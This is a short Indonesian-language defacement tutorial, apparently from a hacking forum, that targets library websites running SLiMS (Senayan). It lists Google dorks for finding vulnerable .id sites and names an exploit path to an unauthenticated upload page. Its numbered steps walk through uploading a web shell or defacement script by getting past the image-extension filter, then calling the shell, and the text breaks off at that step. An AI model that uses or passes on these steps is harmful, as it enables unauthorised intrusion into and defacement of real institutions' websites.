Deface Senayan Exploit Repository

Assalamualaikum Wr wb
Deface Metode Senayan Exploit Repository Upload
(Indonesian Website)
Ekstensi Yg Bisa Di Upload:jpg,gif,png
jadi kalian mesti Maen Bypas Ekstensi
Google Dork: intext:''The Winner in the Category of OSS Indonesia ICT Award 2009''
             inurl:''index.php?p=show_detail&id='' site:id
             inurl:''/slims5-meranti/'' site:id
             intext:This software and this template are released Under GNU GPL License Version 3. The Winner in the Category of OSS Indonesia ICT Award 2009''
             Powered by SLiMS site:id
             Powered by SLiMS | Design by Indra Sutriadi Pipii
             inurl:''/perpustakaan/repository/'' site:id
Exploit: /admin/modules/bibliography/pop_attach.php
1.Dorking Di Google
2.Lalu Pilih Web yg Vuln dan masukan Exploit
  contoh bla bla:v
  (You Knowlah)
3.Otomatis kalian akan masuk ke halaman upload Repository
4.Upload File Kalian Ekstensi Jpg,Png,Gif
  (Bypas Shell Atau Script Defacemu)
5.Panggil Shellmu dengan path

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